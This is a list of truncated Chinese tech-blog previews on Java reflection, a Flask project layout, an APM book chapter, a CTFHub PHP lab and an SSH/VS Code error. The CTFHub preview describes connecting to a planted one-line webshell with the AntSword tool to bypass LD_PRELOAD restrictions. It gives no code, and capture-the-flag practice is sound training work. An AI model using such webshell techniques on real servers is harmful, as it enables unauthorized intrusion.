目录 一、基本引言。 &#xff08;1&#xff09;基本内容回顾。 &#xff08;2&#xff09;本篇博客的核心内容——基本介绍。 二、Java中使用"反射"机制获取成员方法及内部的详细信息。 &#xff08;1&#xff09;"反射"机制获取成员方法及详细信息的基本…

flask后端开发(10):问答平台项目结构搭建

目录 一、项目结构二、具体各个部分 解耦合 一、项目结构 zhiliaooa/ ├── pycache/ ├── blueprints/ # 蓝图目录 │ ├── forms.py # 表单定义 │ ├── qa.py # 问答相关视图 │ └── user.py # 用户相关视图 │ ├── static/ # 静态文件 │ ├── css/ │ ├─…

PDF书籍《手写调用链监控APM系统-Java版》第9章 插件与链路的结合:Mysql插件实现

本人阅读了 Skywalking 的大部分核心代码&#xff0c;也了解了相关的文献&#xff0c;对此深有感悟&#xff0c;特此借助巨人的思想自己手动用JAVA语言实现了一个 “调用链监控APM” 系统。本书采用边讲解实现原理边编写代码的方式&#xff0c;看本书时一定要跟着敲代码。 作者…

CTFHUB-web进阶-php

我们用蚁剑中的这个插件来做这些关卡 一.LD_PRELOAD 发现这里有一句话木马&#xff0c;并且把ant给了我们&#xff0c;我们直接连接蚁剑 右键 选择模式&#xff0c;都可以试一下&#xff0c;这里第一个就可以 点击开始 我们进入到目录&#xff0c;刷新一下&#xff0c;会有一个…

银河麒麟 SSH Vscode连接

SSH连接错误&#xff1a; [20:04:32.376] Failed to set up socket for dynamic port forward to remote port 38671: Socket closed. TCP port forwarding may be disabled, or the remote server may have crashed. See the VS Code Server log above for details. [20:04:3…